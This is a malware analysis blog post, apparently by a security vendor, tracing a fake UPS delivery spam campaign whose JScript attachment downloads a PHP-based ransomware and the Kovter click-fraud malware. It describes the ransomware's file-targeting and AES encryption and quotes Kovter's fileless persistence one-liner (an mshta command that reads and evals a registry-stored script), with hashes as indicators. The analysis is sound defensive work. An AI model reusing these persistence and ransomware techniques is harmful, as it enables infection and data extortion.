Spammed JScript Phones Home To Download NemucodAES And Kovter

Contributed by: Gerald Carsula, Rodel Mendez and Nicholas Ramos

Last June, we reported that Kovter was being spammed together with Cerber ransomware that used a fake email delivery notification. For the last few weeks another set of fake UPS delivery notification spam has emerged again but instead of Kovter leading the payload attack, it was a PHP-based ransomware.

Infection Vector

The initial email spam is purportedly about a failed delivery of an item or a parcel. It asks the user to review the details of the delivery through the attached ZIP file which holds a malicious JS file.

Email_sample02

Figure 1: Email Sample - Fake UPS Delivery Notification

Email_sample02

Figure 2: Email Sample - Fake UPS Delivery Notification

The curious victim can be enticed to extract and execute the (*.JS) file from the attached ZIP archive. On execution, the malicious JavaScript will build a set of URLs from different hostnames on one of its variable arrays.

Attachment_UPS

Figure 3: Email Attachment - JS file

Once connected to one of the URLs, an obfuscated JS file will be downloaded. A sample JS file is shown below and consists of several hardcoded stings. To de-obfuscate it, we replaced these strings with the character "a" and performed a concatenation with the rest of the other variables.

Downloaded_JS(obfuscated)

Figure 4: Obfuscated downloaded JS file

Once properly de-obfuscated, the JS file will immediately create a dummy WORD document file with random characters. It will open the document which serves as a decoy or to trick the user that it has executed a WORD document instead of a JS file.


Downloaded_JS(dummydoc)

Figure 5: De-obfuscated downloaded JS file - Word Document Dummy Creation

Then, the downloaded JS file will build another distinct set of URLs based from a separate set of domain/hostnames and URIs. Take note that the variable "n" is crucial to properly determine what file will be download. A table below shows the URL and the equivalent file that will be downloaded.

Downloaded_JS(downloadbin)

Figure 6: De-obfuscated downloaded JS file - Downloading the Payloads

var n3
URLhttp://{array[item]}/counter/?{hardcoded}0fals3
Filepath%TEMP%/1D2PpPKZcJURTNwSHSFwLCU9Rtm8qb4tk8.exe
DescriptionPHP Executable
MD57A962AFC3D437A5046C3ADE4ED6E2696
SHA-1521FD3420A3939CFD10B181A41D6334728F41CD1

var n4
URLhttp://{array[item]}/counter/?{hardcoded}0fals4
Filepath%TEMP%/php5.dll
DescriptionPHP DLL
MD591660C94F9F3283785FEBCB51CADBA4C
SHA-1242200D2AF9CDFABEDC8BD382F575AD9CFABDBFD

var n2
URLhttp://{array[item]}/counter/?{hardcoded}0fals2
Filepath%TEMP%/1D2PpPKZcJURTNwSHSFwLCU9Rtm8qb4tk82.exe
DescriptionKovter Malware
MD5ED3421FF73709830C46B31188FE0D73E
SHA-18E53AB396DBC806765FDD52EE01C3D6C9DDEAA62

Next, if both the PHP executable and PHP DLL have been downloaded, or are already existing in the system, the downloaded JS file will create an obfuscated PHP script in the %TEMP% folder.

Downloaded_JS(runPHP)

Figure 7: De-obfuscated downloaded JS file - Creating the PHP Script

Then using the PHP executable, the JS file executes the newly created PHP script with the following arguments:
Bitcoin Address, Bitcoin Price, and the Public Key

Downloaded_JS(runPHP)

Figure 8: De-obfuscated downloaded JS file - Executing the PHP Script

A flowchart below shows the full infection flow from e-mail up to the payloads.

PHP Ransomware1
Figure 9: Flowchart - Infection Vector

Main Payload – PHP Ransomware

Since the PHP script is obfuscated, a simple string replacement and gzinflate method should be performed. There is free online tool that could perform gzinflate. Once properly de-obfuscated, it recursively searches for files with specific extension names starting from root of C:\ drive up to root of Z:\ drive.

PHP(Recursive)
Figure 10: PHP Script - Drive Enumeration and Recursive File Searching

It then searches for files the following file extension:

lnk|123|602|dif|docb|docm|dot|dotm|dotx|hwp|mml|odg|odp|ods|otg|otp|ots|ott|pot

potm|potx|ppam|ppsm|ppsx|pptm|sldm|sldx|slk|stc|std|sti|stw|sxc|sxd|sxm|sxw|txt

uop|uot|wb2|wk1|wks|xlc|xlm|xlsb|xlsm|xlt|xltm|xltx|xlw|xml|asp|bat|brd|c|cmd

dch|dip|jar|js|rb|sch|sh|vbs|3g2|fla|m4u|swf|bmp|cgm|djv|gif|nef|png|db|dbf|frm

ibd|ldf|myd|myi|onenotec2|sqlite3|sqlitedb|paq|tbk|tgz|3dm|asc|lay|lay6|ms11

ms11|crt|csr|key|p12|pem|qcow2|vmx|aes|zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip

arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps

sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php

pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv

tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb

slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf

wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi

vmdk|vhd|dsk|img|iso

But also avoids folder names that starts with the following strings:

winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming

msoffice|temporary|cache

PHP(Recursive)

Figure 11: PHP Script - Searching for Files to Encrypt

All the files that matched the criteria above will be listed on a buffer that will be encrypted after it has setup the ransom note. The ransom note needs to be inflated using the same gzinflate method.

PHP(inflateHTA)

Figure 12: PHP Script - Inflate - Ransomnote

Once inflated, some HTA code will be revealed, giving details of the bitcoin payments.

HTA_Source

Figure 13: PHP Script - HTA - Ransomnote

This PHP ransomware uses AES encryption. It will encrypt the first 100000 bytes of a file using a randomly-generated 128 characters long key. Every file has its own unique key. It saves the filename, encryption key and the 100000 encrypted bytes of the said file on a single "database" file.

PHP(encrypt)

Figure 14: PHP Script - File Encryption

Lastly, the PHP script will hash details of computer name, username, OS version, and send it to a CnC server including other information like public key and statistical information on how many name files were searched and encrypted.

PHP(sendsinfo)

Figure 15: PHP Script - Sends out Information

Pcap

Figure 16: Network Traffic - Information send out

The flow chart below gives a full overview of the PHP Ransomware behavior:

PHP Ransomware 2

Figure 17: Flowchart - PHP Ransomware

Possible Secondary Payload: KOVTER Malware - IOC

Kovter is a secondary payload and the actors behind this campaign chose to disable the download and execution of this file. The Kovter executable however was still alive on the web host at the time of analysis so we took a quick look of its behavior. Once, executed it drops a couple of files in %LocalAppData%.

1

Figure 18: Kovter - Dropped File

These consist of a batch file and an encrypted JavaScript file. The batch file loads the encrypted JavaScript.

start "T8OVa8EVZT2kXEVqShD6l" "%LOCALAPPDATA%\b6bee4f9\d2f4b4bf.f80c91052"

Here is the content of the encrypted Javascript script.

2

Figure 19: Kovter - JavaScript

The encrypted JavaScript's file extension .f80c91052 was actually registered by the malware in the infected Windows registry as a valid file extension

3

Figure 20: Kovter - Registered File Extension

This file extension points to a6005236, a handler that points to yet another registry key that contains the JavaScript decryption and loading of the main malware:

HKEY_CLASSES_ROOT\a6005236\shell\open\command

4

Figure 21: Kovter - Spawn Shell

This registry shell entry will execute a JavaScript that loads another obfuscated JavaScript stored in the registry key HKCU\\software\\mecyuvs\\rrattu

Content of the registry key:

"C:\Windows\system32\mshta.exe" "javascript:Sqq8J="kYTJpUP";

s0Y=new ActiveXObject("WScript.Shell");Fm5baD="dxEb";

QF2xm=s0Y.RegRead("HKCU\\software\\mecyuvs\\rrattu");ine7HS9="V";

eval(QF2xm);iDxKR9="2TyRLeos";"

The registry key HKCU\\software\\mecyuvs\\rrattu, is another obfuscated Javascript that loads an obfuscated PowerShell script

6

Figure 22: Kovter - PowerShell Script on Registry

This PowerShell will spawn a regsvr32.exe process where the Kovter module is injected.

8

Figure 23: Kovter - PowerShell Spawn regsrv32.exe

Once Kovter is running in the injected process, it starts its infamous behavior, the Click-fraud traffic.

9

Figure 23: Kovter - Click-fraud traffic

Conclusions

This spam campaign has proven that old tactics are still effective and reliable but also need to be varied from time to time. The same thing that the threat actors behind this spam campaign has been doing. The campaign has used the same old fake notification with an archived JS file. It uses almost the same algorithm of creating multiple sets of URLs which allows it to download the malicious payload. What did vary this time, is the type of payload that was downloaded and executed. Although not new, the attack used PHP based ransomware instead of the common binary ones. The PHP script will not properly work without downloading the non-malicious PHP interpreter binaries but this is something not everyone would expect given it is somewhat hidden beneath all those obfuscation and inflating methods.

Also, it is critical to highlight that having PHP script based ransomware could be potentially dangerous for webservers. Attackers can look for vulnerable upload scripts on these webservers and leverage them by uploading the ransomware onto the server. Thus, this kind of attack is not just only for a client-side but also potentially the server-side of the Internet infrastructure.

Lastly, this campaign also shows us that the Kovter malware is also lurking around in the background awaiting to be triggered by just a simple update in the JS file.

The Trustwave Secure Email Gateway can recognize and block this threat campaign.

Trustwave reserves the right to review all comments in the discussion below. Please note that for security and other reasons, we may not approve comments containing links.